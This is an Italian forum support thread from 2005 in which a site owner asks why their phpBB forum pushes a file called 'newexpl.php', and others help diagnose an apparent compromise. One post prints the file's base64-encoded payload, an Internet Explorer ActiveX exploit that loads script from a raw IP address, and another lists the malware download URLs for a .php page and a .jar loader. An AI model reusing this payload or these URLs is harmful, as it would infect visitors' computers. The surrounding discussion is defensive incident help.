ciao a tutti,
mi sapreste dire cos'è e come mai ad ogni accesso al mio spazio web, (nel forum), mi chiede dis caricare un file denominato newexpl.php?
che cavolo è?
chi cel'ha messo?
ciao a tutti,
mi sapreste dire cos'è e come mai ad ogni accesso al mio spazio web, (nel forum), mi chiede dis caricare un file denominato newexpl.php?
che cavolo è?
chi cel'ha messo?
A me non lo fa.
Ciaooo!!!!!
sks ma a me non compare nessun messaggio per scaricare quel file
Sposto in Supporto->Livello2 :grin:
vorrei allegarvi l'immagine ma non me la fa allegare.. perchè?
neppure in formato zip!
Ultima modifica di lsdforum : 13-07-2005 alle ore 19.28.23
andando nel forum effettivamente richiede di scaricare quel file (firefox 1.0.4)
è un php con qualcosa che assomiglia ad una mail
mavericckCodice:From: <x> Subject: x MIME-Version: 1.0 Content-Type: text/html; charset="utf-8" Content-Transfer-Encoding: base64 PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9uYWwvL0VOIj4KPEhUTUw+PEJPRFk+CjxPQkpFQ1Qgc3R5bGU9ImRpc3BsYXk6bm9uZSIgaWQ9ImFzZHF3ZSIgY2xhc3NpZD0iY2xzaWQ6YWRiODgwYTYtZDhmZi0xMWNmLTkzNzctMDBhYTAwM2I3YTExIj4KPFBBUkFNIG5hbWU9IkNvbW1hbmQiIHZhbHVlPSJSZWxhdGVkIFRvcGljcywgTUVOVSI+CjxQQVJBTSBuYW1lPSJCdXR0b24iIHZhbHVlPSJUZXh0Ol8iPgo8UEFSQU0gbmFtZT0iV2luZG93IiB2YWx1ZT0iJGdsb2JhbF9ibGFuayI+CjxQQVJBTSBuYW1lPSJJdGVtMSIgdmFsdWU9ImNvbW1hbmQ7bXMtaXRzOmM6L3dpbmRvd3MvaGVscC9udHNoYXJlZC5jaG06Oi9hbHRfdXJsX2VudGVycHJpc2Vfc3BlY2lmaWMuaHRtIj4KPC9PQkpFQ1Q+CjxPQkpFQ1Qgc3R5bGU9ImRpc3BsYXk6bm9uZSIgaWQ9ImFzZHF3ZXIiIGNsYXNzaWQ9ImNsc2lkOmFkYjg4MGE2LWQ4ZmYtMTFjZi05Mzc3LTAwYWEwMDNiN2ExMSI+CjxQQVJBTSBuYW1lPSJDb21tYW5kIiB2YWx1ZT0iUmVsYXRlZCBUb3BpY3MsIE1FTlUiPgo8UEFSQU0gbmFtZT0iQnV0dG9uIiB2YWx1ZT0iVGV4dDpfIj4KPFBBUkFNIG5hbWU9IldpbmRvdyIgdmFsdWU9IiRnbG9iYWxfYmxhbmsiPgo8UEFSQU0gbmFtZT0iSXRlbTEiIHZhbHVlPSdjb21tYW5kOyBqYXZhc2NyaXB0OmV4ZWNTY3JpcHQoImRvY3VtZW50LndyaXRlKFwiPHNjcmlwdCBzcmM9aHR0cDovLzE5NS45NS4yMTguMTczL2RsL2FkdjQzOS9KUVRtdWRJLmpwZ1wiK1N0cmluZy5mcm9tQ2hhckNvZGUoNjIpK1wiPC9zY3JcIitcImlwdFwiK1N0cmluZy5mcm9tQ2hhckNvZGUoNjIpKSIpJz4KPC9PQkpFQ1Q+CjxzY3JpcHQ+YXNkcXdlLkhIQ2xpY2soKTtzZXRUaW1lb3V0KCJhc2Rxd2VyLkhIQ2xpY2soKSIsMTAwKTtzZXRUaW1lb3V0KCJkb2N1bWVudC53cml0ZSgnJykiLDIwMCk8L3NjcmlwdD48L0JPRFk+PC9IVE1MPg==
e che cavolo è?
un "virus" messo da qualche hacker???
oppure che può essere?
dove posso cercare questa specie di aggiunta?
non è che è una specie di password stealer?
lo chiedo perchè ogni tanto mi saltano le impostazioni dello skin del forum!
tipo che devo cancellare uno skin con un nome stranissimo e reinstallare lo skin che voglio io...
Ultima modifica di lsdforum : 13-07-2005 alle ore 19.35.57
da dove l'hai scaricato il forum? non parliamo di hacker, se è un appositamente congeniato sono lamer non hacker...
secondo me si tratta più di qualche hack per il forum, installato male
hai messo su qualcosa recentemente?
mavericck
il forum è quello di altervista.
parlo di hacker perchè già una volta mi è stato attaccato e perchè ogni tanto mi cambia lo skin in modo irreversibile e devo smanettare un pochino per rimetterlo in sesto...
che si può fare?
no no non ho installato nulla!Originalmente inviato da mavericckweb
e sicuramente nulla che interagisse con l'utente fino a tal punto
cooome? la skin si cambia da sola ???Originalmente inviato da lsdforum
se è così cambia la tua pass di admin sul forum con una non banale e controlla dal database se qualcun'altro ha i privilegi di admin sul forum..
mavericck
la password è di 23 caratteri... ti sembra banale?
magari sto newexpl è tipo un "trojan" per capirci...
però non saprei.. è una rottura sta finestrella che si apre ogni volta, ma pare che non a tutti faccia la stessa cosa...
mentre gurdavo il forum ho letto sotto la barra di status che leggeva una pagina php su qualche server strano, e tutto ad un tratto avast (antivirus) si è messo a lampeggiare e mi ha bloccato un tentativo di accesso...
fai così, fatti un backup del db da phpmyadmin, cancella tutti i file del forum, compresi i temi...
scarica la versione ufficiale del forum da www.phpbb.it e reinstallalo, ricarica il db e il tema...
precisamente richiama: http://195.95.218.173/dl/error.php
e carica questo jar: http://195.95.218.173/dl/loaderadv439.jar
mi raccomando non andate a guardarli, probabilmente vi becchereste qualche porcheria... comunque fidatevi, avast non sbaglia mail :eyes:
Ultima modifica di neoscript : 13-07-2005 alle ore 21.08.38
si ma così non mi funzionano più gli allegati :(
devo rifare tutto da capo!!
e che sono quegli URL che mi hai riportato?
Ultima modifica di lsdforum : 13-07-2005 alle ore 22.19.17
sono gli url in cui va a prendere la schifezza che poi tenta di metterti nel pc...
comunque non puoi rimanere con quel problema, tanto vale reinstallarlo, gli allegati puoi rimetterli...
ma se tolgo semplicemente il codice sbagliato?
in che pagina è stato inserito?
non saprei, prova a controllare nel tema...
beh ma mavericcweb aveva individuato un codice "sospetto".
dove lo posso trovare?
ho quasi risolto.
era un hack di un ********.
ora il problema è superato!